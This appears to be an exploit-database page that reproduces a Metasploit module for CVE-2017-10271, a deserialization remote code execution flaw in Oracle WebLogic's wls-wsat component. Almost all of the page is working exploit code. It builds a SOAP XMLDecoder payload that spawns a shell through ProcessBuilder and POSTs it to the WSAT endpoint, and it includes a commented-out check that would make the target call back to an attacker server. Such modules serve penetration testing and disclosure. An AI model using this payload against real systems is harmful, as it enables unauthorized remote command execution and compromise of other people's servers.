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Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution

🗓️ 28 Jan 2018 00:00:00Reported by Alexey TyurinType 
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Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution vulnerability in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0 discovered by Alexey Tyurin and Federico Dotta

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`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
# include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',  
'Description' => %q(  
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization  
remote code execution vulnerability. Supported versions that are affected are  
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin  
of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,  
HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check  
and will not be used when executing the exploit itself.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module  
'Luffin', # Proof of Concept  
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery  
],  
'References' =>  
[  
['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin  
['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept  
['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit  
['CVE', '2017-10271'],  
['EDB', '43458']  
],  
'Platform' => %w{ win unix },  
'Arch' => [ ARCH_CMD ],  
'Targets' =>  
[  
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],  
[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]  
],  
'DisclosureDate' => "Oct 19 2017",  
# Note that this is by index, rather than name. It's generally easiest  
# just to put the default at the beginning of the list and skip this  
# entirely.  
'DefaultTarget' => 0  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),  
OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),  
OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),  
# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])  
])  
end  
  
def cmd_base  
if target['Platform'] == 'win'  
return 'cmd'  
else  
return '/bin/sh'  
end  
end  
  
def cmd_opt  
if target['Platform'] == 'win'  
return '/c'  
else  
return '-c'  
end  
end  
  
  
#  
# This generates a XML payload that will execute the desired payload on the RHOST  
#  
def exploit_process_builder_payload  
# Generate a payload which will execute on a *nix machine using /bin/sh  
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
<soapenv:Header>  
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
<java>  
<void class="java.lang.ProcessBuilder">  
<array class="java.lang.String" length="3" >  
<void index="0">  
<string>#{cmd_base}</string>  
</void>  
<void index="1">  
<string>#{cmd_opt}</string>  
</void>  
<void index="2">  
<string>#{payload.encoded.encode(xml: :text)}</string>  
</void>  
</array>  
<void method="start"/>  
</void>  
</java>  
</work:WorkContext>  
</soapenv:Header>  
<soapenv:Body/>  
</soapenv:Envelope>}  
end  
  
#  
# This builds a XML payload that will generate a HTTP GET request to our SRVHOST  
# from the target machine.  
#  
def check_process_builder_payload  
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
<soapenv:Header>  
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
<java version="1.8" class="java.beans.XMLDecoder">  
<void id="url" class="java.net.URL">  
<string>#{get_uri.encode(xml: :text)}</string>  
</void>  
<void idref="url">  
<void id="stream" method = "openStream" />  
</void>  
</java>  
</work:WorkContext>  
</soapenv:Header>  
<soapenv:Body/>  
</soapenv:Envelope>}  
end  
  
#  
# In the event that a 'check' host responds, we should respond randomly so that we don't clog up  
# the logs too much with a no response error or similar.  
#  
def on_request_uri(cli, request)  
random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'  
send_response(cli, random_content)  
  
@received_request = true  
end  
  
#  
# The exploit method connects to the remote service and sends a randomly generated string  
# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive  
# the response from. This is based off of the exploit technique from  
# exploits/windows/novell/netiq_pum_eval.rb  
#  
# This doesn't work as is because MSF cannot mix HttpServer and HttpClient  
# at the time of authoring this  
#  
# def check  
# start_service  
#  
# print_status('Sending the check payload...')  
# res = send_request_cgi({  
# 'method' => 'POST',  
# 'uri' => normalize_uri(target_uri.path),  
# 'data' => check_process_builder_payload,  
# 'ctype' => 'text/xml;charset=UTF-8'  
# }, datastore['TIMEOUT'])  
#  
# print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")  
#  
# waited = 0  
# until @received_request  
# sleep 1  
# waited += 1  
# if waited > datastore['HTTP_DELAY']  
# stop_service  
# return Exploit::CheckCode::Safe  
# end  
# end  
#  
# stop_service  
# return Exploit::CheckCode::Vulnerable  
# end  
  
#  
# The exploit method connects to the remote service and sends the specified payload  
# encapsulated within a SOAP XML body.  
#  
def exploit  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path),  
'data' => exploit_process_builder_payload,  
'ctype' => 'text/xml;charset=UTF-8'  
}, datastore['TIMEOUT'])  
end  
end  
`

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